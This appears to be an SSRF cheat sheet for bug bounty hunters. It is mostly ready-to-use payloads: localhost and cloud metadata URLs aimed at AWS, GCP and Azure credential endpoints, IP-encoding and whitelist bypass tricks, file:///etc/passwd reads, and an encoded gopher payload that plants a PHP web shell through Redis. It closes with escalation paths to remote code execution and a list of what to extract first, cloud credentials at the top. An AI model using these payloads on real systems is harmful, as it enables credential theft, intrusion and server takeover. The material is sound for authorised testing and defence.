Detection Points
Common Vulnerable Parameters
TEXT
url=
uri=
path=
dest=
redirect=
next=
target=
rurl=
domain=
feed=
host=
site=
html=
data=
reference=
proxy=
callback=
imageurl=
iconurl=
webhookurl=Vulnerable Features
TEXT
- PDF generators (wkhtmltopdf, Puppeteer)
- Image processors (ImageMagick)
- File imports (URL-based)
- Webhooks
- URL previews/unfurling
- Proxy services
- Translation services
- Document converters
- Screenshot services
- RSS/Feed readersBasic Payloads
Localhost Access
TEXT
http://localhost
http://127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.0.0.1:3306
http://[::1]
http://0.0.0.0
http://0
http://127.1
http://127.0.1Internal Networks
TEXT
http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
http://169.254.169.254 # Cloud metadataCloud Metadata Endpoints
AWS
TEXT
# IMDSv1 (if not disabled)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
# IMDSv2 Bypass (need header)
# Sometimes apps set X-aws-ec2-metadata-token
http://169.254.169.254/latest/api/token [PUT with TTL header]
# Alternative IPs for 169.254.169.254
http://[::ffff:169.254.169.254]
http://0xa9.0xfe.0xa9.0xfe
http://0251.0376.0251.0376
http://2852039166
http://169.254.169.254.nip.ioGCP
TEXT
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/computeMetadata/v1/project/project-id
# Requires header: Metadata-Flavor: Google
# Some SSRF vulns allow header injection!Azure
TEXT
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# Requires header: Metadata: trueDigitalOcean
TEXT
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-dataKubernetes
TEXT
https://kubernetes.default.svc/
https://kubernetes.default
http://10.96.0.1 # Default API server
/var/run/secrets/kubernetes.io/serviceaccount/token # If file readBypass Techniques
Localhost Bypass
TEXT
# Decimal
http://2130706433 # 127.0.0.1
http://0x7f000001
http://017700000001 # Octal
# IPv6
http://[::1]
http://[::]
http://[0:0:0:0:0:0:0:1]
http://[::ffff:127.0.0.1]
http://[0000::1]
# Dot variations
http://127.1
http://127.0.1
http://127.0.0.1.
http://0.0.0.0
# URL parsing tricks
http://127.0.0.1.nip.io
http://127.0.0.1.xip.io
http://localtest.me
http://0x7f.0x0.0x0.0x1
http://0177.0.0.1Protocol Bypass
TEXT
# When http:// blocked
http://
hTTp://
HTTP://
//127.0.0.1 (protocol-relative)
localhost without scheme
# Other protocols
gopher://
dict://
file:///etc/passwd
ftp://
sftp://
ldap://
tftp://Domain Bypass (Whitelist)
TEXT
# If evil.com whitelisted
http://evil.com.attacker.com
http://attacker.com#evil.com
http://attacker.com?url=http://evil.com
http://evil.com@attacker.com
http://attacker.com\@evil.com # Parser confusion
# DNS rebinding
# Host that resolves to 127.0.0.1 after first lookup
http://1.1.1.1.1time.127.0.0.1.1time.repeat.rebind.it/URL Parsing Tricks
TEXT
# Fragmentation
http://127.0.0.1#@whitelisted.com
http://whitelisted.com@127.0.0.1
http://127.0.0.1%23@whitelisted.com
# Encoding
http://127.0.0.1%2523@whitelisted.com # Double encode
http://127%2e0%2e0%2e1
# Null byte (old parsers)
http://127.0.0.1%00.whitelisted.comGopher Protocol
Redis Commands
TEXT
gopher://127.0.0.1:6379/_
SET x "<?php system($_GET['c']); ?>"
CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SAVE
# URL encoded
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27c%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0AMemcached
TEXT
gopher://127.0.0.1:11211/_stats
gopher://127.0.0.1:11211/_get%20keySMTP
TEXT
gopher://127.0.0.1:25/_HELO%20localhost%0AMAIL%20FROM%3A%3Cattacker%40evil.com%3E%0ARCPT%20TO%3A%3Cvictim%40target.com%3E%0ADATA%0ASubject%3A%20test%0A%0AMessage%0A.%0AQUITBlind SSRF Detection
DNS-Based
TEXT
http://attacker-controlled.burpcollaborator.net
http://ssrf-test.attacker.com
# Check DNS logs for:
# - IP address of server
# - Timing (confirms execution)Time-Based
TEXT
# Compare response times
http://192.168.1.1:80 # Fast if open
http://192.168.1.1:81 # Slow timeout if closed
# Slow internal endpoints
http://internal-api/slow-endpointError-Based
TEXT
# Different errors for:
# - Host exists vs doesn't
# - Port open vs closed
# - Protocol supported vs notEscalation Paths
Internal Service Discovery
TEXT
# Common internal ports to scan
21 FTP
22 SSH
25 SMTP
80 HTTP
443 HTTPS
3306 MySQL
5432 PostgreSQL
6379 Redis
9200 Elasticsearch
11211 Memcached
27017 MongoDBFrom SSRF to RCE
TEXT
1. Access internal admin panels (no auth internally)
2. Redis command execution
3. Gopher to internal services
4. Cloud metadata → IAM credentials → AWS CLI
5. Internal Git repos with secrets
6. Jenkins/CI without internal auth
7. Kubernetes API → pod execBug Bounty Tips
High-Value Targets
TEXT
- PDF export features
- Screenshot/preview services
- Webhook endpoints
- Import from URL
- OAuth callbacks with redirect
- Image/file URL fetchingWhat to Extract First
TEXT
1. Cloud metadata (credentials!)
2. Internal /etc/passwd, /etc/hosts
3. Internal API endpoints
4. Private Git repositories
5. Environment variables
6. Internal dashboardsReport Impact Clearly
TEXT
- "Read AWS credentials" > "Access internal network"
- Show actual extracted data
- Demonstrate cloud takeover if possible
- Chain with other vulns